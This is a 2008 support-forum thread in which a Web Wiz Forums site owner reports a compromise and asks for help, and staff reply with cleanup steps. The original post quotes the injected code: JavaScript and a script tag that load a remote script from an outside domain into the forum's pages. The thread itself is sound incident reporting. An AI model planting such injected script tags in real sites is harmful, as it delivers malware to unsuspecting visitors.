Web Wiz Forums - File injection/update

File injection/update

Printed From: Web Wiz Forums
Category: Web Wiz Web App Support Forums
Forum Name: Web Wiz Forums
Forum Description: Support forum for Web Wiz Forums application.
URL: https://forums.webwiz.net/forum_posts.asp?TID=25972
Printed Date: 03 April 2026 at 11:13am
Software Version: Web Wiz Forums 12.08 - https://www.webwizforums.com

Topic: File injection/update

Posted By: ohiopbx
Subject: File injection/update
Date Posted: 17 July 2008 at 4:03pm

The past few days our forum was comprimised. Our RTE_popup_word_paste.asp was modified outside my control. The javascript was updated:

var iframeContent;
iframeContent = '<html>\n';
iframeContent += '<head>\n';
iframeContent += '<style> html,body{border:0px;background-color:#FFFFFF;}</style>\n';
iframeContent += '</head>\n';
iframeContent += '<body leftmargin="1" topmargin="1" marginwidth="1" marginheight="1">\n';
iframeContent += '<script src=http://www.cliprts.com/fgg.js></script></body>\n';
iframeContent += '</html>';

Also on other pages it would have this at the end of the file:

<script src=http://www.cliprts.com/fgg.js></script></body>

I have no idea hows these files are getting hacked but its quite frustrating. I cannot find anything online. I have changed all my passwords and everything but i dont think thats the issue because i use pretty tough passwords for my stuff...

any idea's would be appreciated.

Replies:

Posted By: WebWiz-Bruce
Date Posted: 17 July 2008 at 4:43pm

As long as you have kept your Web Wiz Forums up to date with the latest version they will not have done this through Web Wiz Forums.

There are many ways this could have happened and the hacker may have even done it through another web site on the same server if your host has not locked down the server.

Usually these types of hacks are done when a hacker places malicouse files on the server which they then use a back door to get into the site and deface it whenever they want.

There are also serveral viruses at present which place this type of code into web pages that it finds on the computer, so it may be that there is a virus on the server or your computer.

What you will need to do is make is

1. Make sure you know what is in all files on your website and remove any files that you don't know what they are.
2. Scan your computer for viruses.
3. Contact your web host. There may have been other sites hacked.
4. Have your web host virus scan the server
5. Have your web host chnage the permissions for your web site to 'Read' only.

-------------
https://www.webwiz.net/web-wiz-forums/forum-hosting.htm" rel="nofollow - Web Wiz Forums Hosting
https://www.webwiz.net/web-hosting/windows-web-hosting.htm" rel="nofollow - ASP.NET Web Hosting

Posted By: ohiopbx
Date Posted: 18 July 2008 at 3:46am

i agree, i need to contact Godaddy asap thanks bud